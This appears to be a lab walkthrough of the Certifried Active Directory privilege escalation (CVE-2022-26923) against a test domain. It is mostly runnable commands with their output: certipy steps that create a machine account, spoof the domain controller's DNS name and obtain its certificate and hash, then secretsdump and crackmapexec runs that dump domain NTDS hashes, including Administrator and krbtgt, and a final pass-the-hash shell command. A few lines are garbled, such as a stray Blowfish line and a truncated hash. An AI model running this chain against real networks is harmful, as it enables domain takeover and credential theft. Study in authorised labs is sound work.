Certifried - CVE-2022–26923

• Oliver Lyak found out a way to escalate privilege as a low privilege user into an active directory. This consist of change the dnsHostName property on a created computer. The idea look the same as samAccountName vulnerability, it is a confusion with name on authentication. Details are here : https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4

An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.

• Create an account with a domain user and set a fake dns name as the domain controler.

sudo certipy account create -u joaquin.Pereida@maryland.local -p 'horse' -user 'certifriedpc' -pass 'certifriedpass' -dns 'baltimore.maryland.local'

• Request a certificate with the created computer on template Machine

sudo certipy req -u 'certifriedpc$'@maryland.local -p 'certifriedpass' -target salisbury.maryland.local -ca MARYLAND-CA -template Machine

• Authenticate with the certificate as bailtimore (the dc)

sudo certipy auth -pfx baltimore.pfx -username 'baltimore$' -domain maryland.local -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759

• Add variable to working environment

• Dump the ndts with the kerberos ticket we just get

export KRB5CCNAME=/home/watchdog/Attacking_Active_Directory/ESC6/baltimore.ccache

sudo secretsdump.py -k -no-pass -just-dc-user carmelo.Anthony MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local


Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
[*] Kerberos keys grabbed
carmelo.Anthony:aes256-cts-hmac-sha1-96:da49788946f1189c92fda8683bd91bc0b18933a0cb5770d30c9f4648b9fefb20
carmelo.Anthony:aes128-cts-hmac-sha1-96:e728e401a5678362449ceacd2b53dec9
carmelo.Anthony:des-cbc-md5:5ed5d58f941ac4d3
[*] Cleaning up... 

• delete the created computer with a domain admin user

sudo certipy account delete -u carmelo.Anthony@maryland.local -hashes 'aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a' -user 'certifriedpc'

Dump or get Exec

crackmapexec smb 192.168.56.12 -u carmelo.anthony -H 'ad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a' --ntds

"class": algorithms.Blowfish,
SMB         192.168.56.12   445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         192.168.56.12   445    BALTIMORE        [+] maryland.local\carmelo.anthony:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         192.168.56.12   445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.56.12   445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         192.168.56.12   445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1ad253c7f9110449bd1ccbcadf2ca611:::
SMB         192.168.56.12   445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         192.168.56.12   445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
SMB         192.168.56.12   445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         192.168.56.12   445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         192.168.56.12   445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         192.168.56.12   445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         192.168.56.12   445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759:::
SMB         192.168.56.12   445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
SMB         192.168.56.12   445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:16827e6dccaaa8328e7092324980f207:::

smbexec.py -hashes ad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a 'MARYLAND'/'carmelo.anthony'@'maryland.local'